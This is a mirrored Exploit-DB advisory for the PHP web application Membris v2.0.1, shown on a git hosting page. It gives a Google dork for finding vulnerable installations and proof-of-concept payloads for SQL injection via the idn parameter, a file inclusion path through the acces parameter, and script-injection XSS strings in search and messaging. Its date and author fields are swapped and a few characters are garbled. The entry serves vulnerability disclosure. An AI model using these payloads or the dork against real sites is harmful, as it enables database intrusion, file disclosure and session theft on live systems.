bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/18970.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

48 lines
No EOL
1.2 KiB
Text
Raw Blame History

###################################
# Exploit:Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities
# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abolalh
# Author:01/06/2012
# E-Mail: xa3@hotmail.com
# Software Link: http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
# Version: Membris v 2.0.1
###################################
# Exploit-DB Note:
# Application also suffers from
# stored XSS in the messaging system.
# Insert <script>alert('xss');</script>
# in the message body.
SQL:
voir-actualites.php
Exploit:
voir-actualites.php?idn=1 '
+-----------------------------------------------------------+
File Inclusion
include ("../plugins/" . $_GET['acces'] . "/fonctions.php");
Exploit:
admin/actions-plugin.php<68>acces=../index.php
+-----------------------------------------------------------+
XSS
search.php
Exploit:
search.php?req= XSS
search.php?req='--></style></script><script>alert(0x0002BC)</script>
+-----------------------------------------------------------+
#+--------------------------------------------------+#
#[<5B>] Greetz to : sec4ever #
#---------------------------------------------------+#
Reference in a new issue View git blame Copy permalink